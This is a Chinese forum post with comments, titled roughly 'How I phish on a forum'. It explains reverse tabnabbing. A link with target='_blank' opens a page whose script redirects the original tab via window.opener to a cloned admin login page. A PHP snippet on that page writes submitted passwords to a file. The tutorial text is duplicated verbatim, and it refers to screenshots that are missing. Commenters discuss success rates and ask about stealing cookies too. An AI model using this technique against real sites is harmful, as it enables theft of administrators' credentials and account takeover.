看我如何在论坛进行钓鱼
当用户点击了某个网站中带有target=”_blank”属性的超链接后,浏览器会单独新建一个标签页来显示该链接所指向的内容。但是请注意,在这一瞬间,浏览器会允许新建的标签页通过一个名为“window.opener”的浏览器API来与之前的网页进行短暂通信。
参考链接:http://www.freebuf.com/vuls/113634.html
比如我要钓鱼一个论坛的后台密码,我先把他的html保存下载,然后我添加几行代码,示例代码如下:
$content = $_POST['name']
file_put_contents('password.txt',$content);
打开以后是这样的
然后我再创建个diaoyu.php文件,事例代码如下:
<meta http-equiv="refresh" content="1;url= https://pan.baidu.com/s/1eRFAiUQ">
<script>
if(window.opener){
window.opener.location = "http://127.0.0.1/phish.php";
}
</script>
然后比如我发个帖,发完是这样的
点击以后是新开标签页是调到了百度盘,如图
但是刚刚的标签页跳到了phish.php页面,
然后不小心输入密码以后,
过程
参考链接:http://www.freebuf.com/vuls/113634.html
比如我要钓鱼一个论坛的后台密码,我先把他的html保存下载,然后我添加几行代码,示例代码如下:
$content = $_POST['name']
file_put_contents('password.txt',$content);
打开以后是这样的
然后我再创建个diaoyu.php文件,事例代码如下:
<meta http-equiv="refresh" content="1;url= https://pan.baidu.com/s/1eRFAiUQ">
<script>
if(window.opener){
window.opener.location = "http://127.0.0.1/phish.php";
}
</script>
然后比如我发个帖,发完是这样的
点击以后是新开标签页是调到了百度盘,如图
但是刚刚的标签页跳到了phish.php页面,
然后不小心输入密码以后,
过程
评论52次
这个诱导的成功率不是很高,需要管理员点了才行,天知道管理员会不会去点的,另外点了之后会打开后台这个,很容易引起管理员注意吧
对于中国这么多网民,不懂的人太多了,很多人会被钓鱼。
我只想知道,突然蹦出来一个后台登陆,我为什么要登陆
学xi了!
666666学xi了
https://www.leavesongs.com/HTML/opener-fishing.html 。。。。。
这个钓鱼的前提是已经拿下了整个站吧,那钓鱼不是没有意义了吗?
这个有创意,对一些安全意识不高的管理员适用
这个经常被应用在网页游xi私服广告上 这个钓鱼你网址不一样 人家不会那么傻吧
@EazyLov3 想多了。钓鱼页是他自己的,又不是目标站的。
我知道啊 ,这跟我的提问有什么关联吗。搭个环境测试不是很正常吗
@EazyLov3 想多了。钓鱼页是他自己的,又不是目标站的。
这个是针对discuz还是通用? 假如有些论坛管理页面有Cookie了不用再输入帐号密码可以钓到Cookie吗